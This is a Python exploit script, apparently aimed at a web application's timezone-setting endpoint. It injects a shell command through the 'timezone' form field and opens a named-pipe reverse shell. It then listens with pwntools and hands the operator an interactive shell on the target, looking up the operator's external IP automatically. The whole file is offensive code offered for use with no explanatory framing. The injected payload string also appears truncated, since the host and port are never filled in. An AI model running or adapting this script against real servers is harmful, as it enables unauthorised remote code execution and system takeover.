#!/usr/bin/python3 import requests import argparse import json from pwn import * def exploit(target,localhost,localport): url = f'{target}/index.php/management/set_timezone' headers = { 'Accept': 'application/json, text/javascript, */*; q=0.01', 'X-Requested-With': 'XMLHttpRequest', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'Origin': f'{target}', 'Referer': f'{target}/index.php/management/datetime', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9', 'Connection': 'close' } data = { 'timezone': f'`mknod /tmp/pipe p;/bin/sh 0/tmp/pipe`' } try: response = requests.post(url, headers=headers, data=data, timeout=3) except: pass def get_external_ip(): endpoint = 'https://ipinfo.io/json' response = requests.get(endpoint, verify = True) if response.status_code != 200: return 'Status:', response.status_code, 'Problem with the request. Exiting.' exit() data = response.json() return data['ip'] if __name__ == "__main__": ## parse argument parser = argparse.ArgumentParser() parser.add_argument("-t", "--target", action="store", help="Target url, http://localhost:9000", default=False, required=True) parser.add_argument("-l", "--localhost", action="store", help="Local IP address for reverse shell", default=False) parser.add_argument("-p", "--localport", action="store", help="Local port for reverse shell", default="443") args = parser.parse_args() if args.target is not False: if args.localhost is False: # get external ip address for listener try: args.localhost = get_external_ip() except: print("Not able to get external IP address") sys.exit(1) # running listener l = listen(args.localport) # sending exploit payload exploit(args.target,args.localhost,args.localport) # waiting for a reverse connection try: s = l.wait_for_connection() s.interactive() except: pass finally: l.close() else: parser.print_help() parser.exit()